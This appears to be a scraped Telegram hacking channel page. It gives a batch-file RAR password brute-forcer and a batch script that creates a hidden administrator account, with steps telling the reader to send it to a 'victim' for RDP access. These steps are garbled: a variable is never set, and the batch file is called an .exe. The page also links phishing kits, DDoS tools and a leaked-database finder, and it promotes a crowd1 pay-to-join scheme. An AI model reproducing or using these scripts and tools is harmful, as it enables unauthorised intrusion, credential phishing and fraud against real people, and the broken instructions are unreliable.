Free Hacking Tutorial
6.3K subscribers
59 photos
12 videos
14 files
141 links
@hackers_chats

Paid Apps And Software's
Free Udemy Courses
Hacking Tools And Courses


Disclaimer : This channel is Only for educational purposes we are not responsible for any kind of illegal activities done by you.
Download Telegram
Channel photo updated
king-phisher.zip
689.2 KB
PHISHING ATTACK PROGRAM.

By @free_hacking_tutorial
.RAR FILE PASSWORD CRACKING TUTORIAL



1.Create a new text file with note pad.

2. Paste this code into the file
( press to copy)

REM ============================================================
REM
@free_hacking_tutorial
@echo off
title Rar Password Cracker
mode con: cols=47 lines=20
copy “C:\Program Files\WinRAR\Unrar.exe”
SET PSWD=0
SET DEST=%TEMP%\%RANDOM%
MD %DEST%
:RAR
cls
echo ———————————————-
echo GET DETAIL
echo ———————————————-
echo.
SET/P “NAME=Enter File Name : ”
IF “%NAME%”==”” goto NERROR
goto GPATH
:NERROR
echo ———————————————-
echo ERROR
echo ———————————————-
echo Sorry you can’t leave it blank.
pause
goto RAR
:GPATH
SET/P “PATH=Enter Full Path : ”
IF “%PATH%”==”” goto PERROR
goto NEXT
:PERROR
echo ———————————————-
echo ERROR
echo ———————————————-
echo Sorry you can’t leave it blank.
pause
goto RAR
:NEXT
IF EXIST “%PATH%\%NAME%” GOTO START
goto PATH
:PATH
cls
echo ———————————————-
echo ERROR
echo ———————————————-
echo Opppss File does not Exist..
pause
goto RAR
:START
SET /A PSWD=%PSWD%+1
echo 0 1 0 1 1 1 0 0 1 0 0 1 1 0 0 1 0 1 0 0 1 0 1
echo 1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 1 1 1 0 0 0
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 0 0 1 1 1
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 0 0 0 0 0
echo 1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 1 0 1 0 0
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 1 1 1 1 0
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 0 0 0 1 1 0
echo 1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 1 1 1 1 0
echo 0 1 0 1 1 1 0 0 1 0 0 1 1 0 0 1 0 1 0 0 1 1 0
echo 1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 0 1 0 1 0 0
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 1 0 1 0 1
echo 1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 1 0 1 0 0
echo 0 1 0 1 1 1 0 0 1 0 0 1 1 0 0 1 0 1 0 0 1 1 0
echo 1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 1 0 1 0 0 1
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 1 1 1 0 0
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 1 1 0 1 1
echo 1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 0 0 1 1 0
echo 1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 0 1 0 1 0 0
echo 0 1 0 1 1 1 0 0 1 0 0 1 1 0 0 1 0 1 1 1 0 1 1
echo 1 0 1 0 0 1 0 1 1 1 1 0 0 1 0 0 1 0 0 1 1 0 1
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 1 1 0 1 1
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 1 0 1 1 0
echo 1 1 1 1 1 0 1 1 0 0 0 1 1 0 1 0 1 0 1 1 0 0 0
echo 0 0 0 0 1 1 1 1 1 0 1 0 1 0 1 0 0 0 0 1 1 0 1
echo 1 0 1 0 1 1 1 0 0 1 0 1 0 1 0 0 0 0 0 1 0 1 1
UNRAR E -INUL -P%PSWD% “%PATH%\%NAME%” “%DEST%”
IF /I %ERRORLEVEL% EQU 0 GOTO FINISH
GOTO START
:FINISH
RD %DEST% /Q /S
Del “Unrar.exe”
cls
echo ———————————————-
echo CRACKED
echo ———————————————-
echo.
echo PASSWORD FOUND!
echo FILE = %NAME%
echo CRACKED PASSWORD = %PSWD%
pause>NUL
exit
REM ============================================================


3. Save it as a .bat batch file.

4. Now run the program

5. Enter the zip file path that you want to crack the password for.

6. The program will take its time and crack the password.

Enjoy 🎈

__________________________

@free_hacking_tutorial
GET ACCESS TO ANYONE'S COMPUTER SYSTEM THROUGH IP LOGGING!

1. Open notepad and paste this code

set /p pass= PLS INSERT YOUR PASSWORD :
net user /add %user% %pass%
net localgroup administrators /add %user%
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v %user% /t REG_DWORD /d 0
pause


3. Save this as a batch file.

4. Send this .exe to the victim.

5. The person's information is logged successfully!

6. Now you can access their system through RDP.

Enjoy 🎈
__________________________

@free_hacking_tutorial
Want Social media hacking tutorial?
Anonymous Poll
97%
Yes
3%
No
I have been hacking since
public poll

>1 year – 262
👍👍👍👍👍👍👍 65%

< 1 year – 141
👍👍👍👍 35%

👥 403 people voted so far.
Please open Telegram to view this post
VIEW IN TELEGRAM
Free Hacking Tutorial via @Qualitymovbot
Message
Any questions and information about the business you can inbox me @solo_learner
Free Hacking Tutorial via @Qualitymovbot
Message
Only 3 hours left for epic promotion sign up, buy the white package and get instantly upgraded to black the tutorial about the system is down below
Free Hacking Tutorial via @Qualitymovbot
Message
Those of you who have registered your fear of loss is counting down so buy the white package and be official paying member of crowd1 and invite 4 paying friends within 4 weeks and get 125€ instantly credited to your account


For questions please inbox me @solo_learner
DDOS ATTACK PROGRAMS

Highly Powerful softwares!

https://mega.nz/folder/a6YmCYxA#Y69Ofo-PFI2ZWoMNxivv2A

_________________________

@free_hacking_tutorial
FIND LEAKED DATABASES

https://github.com/woj-ciech/LeakLooker

__________________________
Forwarded from Deleted Account
Forwarded from Deleted Account
ALL IN ONE HACKING TOOL! at 1000 members or 10k channel fast!!
Anonymous Poll
94%
Want this
6%
No, I am expert
Z-PHISHER MULTIPLE PHISHING TOOL PAGES CODE
Forwarded from Deleted Account
$ apt update && apt upgrade

$ apt install git

$ git clone git://github.com/htr-tech/zphisher.git

$ cd zphisher

$ bash zphisher.sh